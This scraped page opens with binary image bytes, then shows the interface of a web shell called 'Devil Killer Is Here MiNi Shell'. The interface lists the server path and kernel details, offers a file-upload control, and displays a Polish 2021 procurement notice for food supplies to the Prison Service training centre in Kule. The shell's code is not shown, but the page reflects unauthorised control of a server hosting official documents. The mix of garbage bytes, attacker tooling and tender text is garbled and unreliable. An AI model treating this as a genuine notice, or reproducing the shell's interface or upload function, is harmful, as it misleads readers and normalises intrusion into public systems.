JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211201/0029416001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy artykułów spożywczych, produktów mącznych dla COSSW w Kulach oraz <br/>Oddziału Zamiejscowego w Sulejowie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centralny Ośrodek Szkolenia Służby Więziennej w Kulach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000675181</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kule 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kule</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp_kule@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zp.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Centralny Ośrodek Szkolenia Służby Więziennej w Kulach </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy artykułów spożywczych, produktów mącznych dla COSSW w Kulach oraz <br/>Oddziału Zamiejscowego w Sulejowie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4f096f08-528c-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00294160</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00020015/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.7 Dostawy artykułów spożywczych, produktów mącznych do COSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/ ,<br/>https://epuap.gov.pl/wps/portal oraz za pomocą poczty elektronicznej zp_kule@sw.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu<br/>https://epuap.gov.pl/wps/portal<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym<br/>pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje<br/>się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i<br/>wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych<br/>środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w<br/>postępowaniu, przyjmuje się datę ich przekazania na ePUAP.<br/>7. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email:<br/>zp_kule@sw.gov.pl . Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>Ogłoszenie nr 2021/BZP 00186489/01 z dnia 2021-09-21<br/>2021-09-21 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020 r. poz. 2452) oraz rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020<br/>r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">COS-DKW.2232.19.2021.TM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawy artykułów spożywczych dla COSSW w Kulach<br/>l.p.	Nazwa artykułu	j.m.	Ilość<br/>1	Groch łuskany połówki	kg	80<br/>2	Orzechy włoskie łuskane	kg	6<br/>3	Fasola biała „Jaś”	kg	60<br/>4	Rodzynki	kg	10<br/>5	Ogórek kiszony	kg	300<br/>6	Kapusta kiszona	kg	600<br/>7	Minikolby kukurydzy	kg	10<br/>8	Przecier ogórkowy	kg	40<br/>9	Szczaw konserwowy	kg	40<br/>10	Koncentrat buraczany	l	20<br/>11	Seler konserwowy łagodny	kg	50<br/>12	Pieczarki marynowane	kg	10<br/>13	Pieczarki krojone	kg	30<br/>14	Papryka konserwowa	kg	150<br/>15	Chrzan tarty	kg	40<br/>16	Pomidory krojone	kg	30<br/>17	Koncentrat pomidorowy	kg	200<br/>18	Groszek konserwowy	kg	150<br/>19	Fasola konserwowa czerwona	kg	30<br/>20	Kukurydza konserwowa	kg	150<br/>21	Ogórek konserwowy	kg	300<br/>22	Żurawina mięsa	kg	10<br/>23	Dżem niskosłodzony	kg	50<br/>24	Dżem wysokosłodzony	kg	150<br/>25	Ananas w syropie	kg	80<br/>26	Brzoskwinie w syropie	kg	40<br/>27	Śliwki suszone kalifornijskie	kg	30<br/>28	Olej	l	500<br/>29	Oliwa z oliwek	l	5<br/>30	Mąka pszenna	kg	500<br/>31	Kasza jęczmienna	kg	150<br/>32	Kasza manna	kg	40<br/>33	Kasza gryczana	kg	80<br/>34	Płatki – musli	kg	5<br/>35	Płatki czekoladowe	kg	20<br/>36	Płatki kukurydziane	kg	20<br/>37	Płatki z miodem	kg	20<br/>38	Ryż biały	kg	250<br/>39	Mąka ziemniaczana	kg	100<br/>40	Kwasek cytrynowy	kg	4<br/>41	Bułka tarta	kg	200<br/>42	Groszek ptysiowy	kg	20<br/>43	Paluszki solone	kg	10<br/>44	Grzanki	kg	15<br/>45	Cukier	kg	800<br/>46	Miód porcjowany	kg	150<br/>47	Napój kakaowy	kg	15<br/>48	Czekolada mleczna	kg	200<br/>49	Krem czekoladowy	kg	80<br/>50	Wafelek w czekoladzie	kg	150<br/>51	Makaron gruby	kg	200<br/>52	Makaron nitki	kg	40<br/>53	Zacierki	kg	30<br/>54	Makaron ryżowy	kg	40<br/>55	Makaron lasagne	kg	60<br/>56	Kawa rozpuszczalna	kg	20<br/>57	Kawa naturalna	kg	10<br/>58	Herbata expresowa	kg	100<br/>59	Herbata expresowa owocowa	kg	10<br/>60	Liść laurowy	kg	1<br/>61	Majeranek	kg	4<br/>62	Papryka mielona słodka	kg	3<br/>63	Ziele angielskie	kg	3<br/>64	Tymianek	kg	1<br/>65	Ocet	l	50<br/>66	Ketchup	kg	300<br/>67	Musztarda delikatesowa stołowa	kg	100<br/>68	Przyprawa do potraw typu &#34;Wegeta&#34;	kg	40<br/>69	Przyprawa do mięsa	kg	10<br/>70	Przyprawa do karczku	kg	10<br/>71	Przyprawa do wołowiny	kg	5<br/>72	Delikata do ryb	kg	10<br/>73	Delikata do kurczaka	kg	20<br/>74	Przyprawa do zup w płynie uniwersalna	l	100<br/>75	Przyprawa do potraw poddawanych obróbce term. Typu &#34;Jarzynka&#34;	kg	30<br/>76	Przyprawa gyros	kg	1<br/>77	Przyprawa curry	kg	1<br/>78	Czosnek granulowany	kg	3<br/>79	Przyprawa do potraw typu &#34;Kucharek&#34;	kg	30<br/>80	Majonez dekoracyjny	l	300<br/>81	Gałka muszkatołowa	kg	1<br/>82	Cynamon	kg	1<br/>83	Pieprz czarny mielony	kg	15<br/>84	Pieprz ziołowy	kg	3<br/>85	Pieprz kolorowy ziarnisty	kg	1<br/>86	Zioła prowansalskie	kg	1<br/>87	Bazylia	kg	2<br/>88	Sól	kg	150<br/>89	Sól czosnkowa	kg	3<br/>90	Żelatyna spożywcza	kg	10<br/>91	Żurek w płynie	l	150<br/>92	Proszek do pieczenia	kg	1<br/>93	Cukier waniliowy	kg	1<br/>94	Pasztet drobiowy	kg	100<br/>95	Konserwa mięsna	kg	100<br/>96	Sos tomato pronto	kg	15<br/>97	Sok owocowy	l	600<br/>98	Sok pomarańczowy	l	2000<br/>99	Sok jabłkowy	l	500<br/>100	Naturalna woda mineralna gazowana/niegazowana	l	5000<br/>101	Naturalna woda mineralna gazowana/niegazowana	l	16000<br/>Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15981000-8 - Wody mineralne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03212213-6 - Groch suszony</p> <p class="mb-0">03220000-9 - Warzywa, owoce i orzechy</p> <p class="mb-0">15331000-7 - Warzywa przetworzone</p> <p class="mb-0">15331110-1 - Przetworzone warzywa korzeniowe</p> <p class="mb-0">15332290-3 - Dżemy</p> <p class="mb-0">15411100-3 - Olej roślinny</p> <p class="mb-0">15612100-2 - Mąka pszenna</p> <p class="mb-0">15800000-6 - Różne produkty spożywcze</p> <p class="mb-0">15820000-2 - Sucharki i herbatniki; wyroby piekarskie i ciastkarskie o przedłużonej trwałości</p> <p class="mb-0">15831200-4 - Cukier biały</p> <p class="mb-0">15851100-9 - Makaron niegotowany</p> <p class="mb-0">15861000-1 - Kawa</p> <p class="mb-0">15870000-7 - Przyprawy i przyprawy korzenne</p> <p class="mb-0">15890000-3 - Różne produkty spożywcze i produkty suszone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach: <br/>1) „Łączna cena ofertowa brutto” – C; <br/>2) „Czas wymiany wadliwego towaru, uzupełnienia towaru ” – W;<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona według poniższego wzoru: <br/> L = C + W<br/>gdzie: <br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Łączna cena ofertowa brutto”, <br/>W – punkty uzyskane w kryterium „Czas wymiany wadliwego towaru, uzupełnienia towaru”,<br/>Jeżeli Wykonawca nie określi czasu wymiany/uzupełnienia towaru, to Zamawiający przyjmie, że Wykonawca zaoferował czas powyżej 24 godzin.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany wadliwego towaru, uzupełnienia towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawy artykułów spożywczych dla COSSW w Kulach Oddział Zamiejscowy w Sulejowie <br/>l.p.	Nazwa artykułu	j.m.	Ilość<br/>1	Groch łuskany połówki	kg	120<br/>2	Fasola biała &#34;Jaś&#34;	kg	200<br/>3	Rodzynki	kg	20<br/>4	Pasztet drobiowy	kg	140<br/>5	Konserwa mięsna	kg	100<br/>6	Ogórek kiszony	kg	400<br/>7	Przecier ogórkowy	kg	50<br/>8	Szczaw konserwowy	kg	50<br/>9	Koncentrat buraczany	l	25<br/>10	Seler konserwowy łagodny	kg	30<br/>11	Pieczarki marynowane	kg	40<br/>12	Kapusta kiszona	kg	700<br/>13	Groszek konserwowy	kg	40<br/>14	Kukurydza konserwowa	kg	55<br/>15	Chrzan tarty	kg	25<br/>16	Pomidory krojone bez skórki	kg	70<br/>17	Koncentrat pomidorowy	kg	200<br/>18	Fasola konserwowa czerwona	kg	60<br/>19	Ogórek konserwowy	kg	900<br/>20	Papryka konserwowa	kg	900<br/>21	Sałatka szwedzka	kg	150<br/>22	Sałatka wielowarzywna	kg	150<br/>23	Sałatka obiadowa	kg	150<br/>24	Kapusta czerwona konserwowa	kg	150<br/>25	Sałatka z buraczków	kg	150<br/>26	Ćwikła z chrzanem	kg	90<br/>27	Jabłka prażone	kg	70<br/>28	Galaretka	kg	30<br/>29	Dżem niskosłodzony	kg	470<br/>30	Ananas w syropie	kg	140<br/>31	Brzoskwinie w syropie	kg	120<br/>32	Śliwki suszone kalifornijskie	kg	20<br/>33	Olej	l	550<br/>34	Budyń	kg	25<br/>35	Ryż paraboliczny	kg	150<br/>36	Ryż biały	kg	70<br/>37	Mąka pszenna	kg	200<br/>38	Kasza jęczmienna pęczak	kg	80<br/>39	Kasza jęczmienna	kg	25<br/>40	Kasza gryczana	kg	80<br/>41	Płatki czekoladowe	kg	120<br/>42	Płatki kukurydziane	kg	120<br/>43	Mąka ziemniaczana	kg	80<br/>44	Żelatyna spożywcza	kg	10<br/>45	Kwasek cytrynowy	kg	2<br/>46	Groszek ptysiowy	kg	35<br/>47	Rogal z nadzieniem	kg	65<br/>48	Grzanki	kg	65<br/>49	Cukier waniliowy	kg	2<br/>50	Cukier	kg	1500<br/>51	Miód porcjowany	kg	15<br/>52	Napój kakaowy	kg	7<br/>53	Krem czekoladowy	kg	15<br/>54	Wafelek w czekoladzie	kg	70<br/>55	Baton czekoladowy z karmelem	kg	70<br/>56	Makaron pióra	kg	90<br/>57	Makaron nitki	kg	110<br/>58	Makaron świderki	kg	120<br/>59	Makaron wstęgi	kg	90<br/>60	Makaron kokardki	kg	120<br/>61	Zacierki	kg	11<br/>62	Kawa rozpuszczalna	kg	15<br/>63	Kawa naturalna	kg	1<br/>64	Herbata expresowa	kg	110<br/>65	Herbata expresowa owocowa	kg	3<br/>66	Liść laurowy	kg	2<br/>67	Majeranek	kg	4<br/>68	Papryka słodka	kg	3<br/>69	Papryka ostra	kg	2<br/>70	Ziele angielskie	kg	2<br/>71	Przyprawa curry	kg	4<br/>72	Kurkuma	kg	1<br/>73	Ocet	l	30<br/>74	Ketchup	kg	200<br/>75	Musztarda delikatesowa stołowa	kg	90<br/>76	Przyprawa warzywna do potraw	kg	60<br/>77	Delikata do ryb	kg	1<br/>78	Delikata do kurczaka	kg	4<br/>79	Przyprawa do karczku	kg	3<br/>80	Przyprawa do wołowiny	kg	2<br/>81	Majonez dekoracyjny	l	330<br/>82	Gałka muszkatołowa	kg	1<br/>83	Cynamon	kg	2<br/>84	Pieprz czarny mielony	kg	5<br/>85	Pieprz czarny ziarnisty	kg	5<br/>86	Pieprz ziołowy	kg	5<br/>87	Pieprz kolorowy ziarnisty	kg	3<br/>88	Tymianek	kg	1<br/>89	Rozmaryn	kg	1<br/>90	Zioła prowansalskie	kg	1<br/>91	Bazylia	kg	0<br/>92	Oregano	kg	0<br/>93	Sól	kg	240<br/>94	Imbir	kg	1<br/>95	Żurek w płynie	l	200<br/>96	Przyprawa do zup ,sosów i sałatek	kg	200<br/>97	Sosy sałatkowe	kg	10<br/>98	Sos z zielonym pieprzem	kg	7<br/>99	Sos do makaronu Carbonara	kg	3<br/>100	Sos do makaronu Bolognese	kg	10<br/>101	Barszcz biały	kg	25<br/>102	Zupa pieczarkowa	kg	10<br/>103	Zupa brokułowa	kg	10<br/>104	Zupa cebulowa	kg	10<br/>105	Krem z borowików	kg	10<br/>106	Bulion drobiowy	kg	18<br/>107	Bulion wołowy	kg	18<br/>108	Naturalna woda mineralna niegazowana / gazowana 0,50 litra	litr	600<br/>109	Naturalna woda mineralna niegazowana/gazowana 1,50 litra	litr	15000<br/>110	Napoje owocowe	litr	250<br/>Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 5a do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15981000-8 - Wody mineralne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03212213-6 - Groch suszony</p> <p class="mb-0">15331142-4 - Kapusta przetworzona</p> <p class="mb-0">15332400-8 - Owoce konserwowane</p> <p class="mb-0">15842220-0 - Batony czekoladowe</p> <p class="mb-0">15870000-7 - Przyprawy i przyprawy korzenne</p> <p class="mb-0">15872400-5 - Sól</p> <p class="mb-0">15890000-3 - Różne produkty spożywcze i produkty suszone</p> <p class="mb-0">15891000-0 - Zupy i buliony</p> <p class="mb-0">15891400-4 - Zupy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach: <br/>1) „Łączna cena ofertowa brutto” – C; <br/>2) „Czas wymiany wadliwego towaru, uzupełnienia towaru ” – 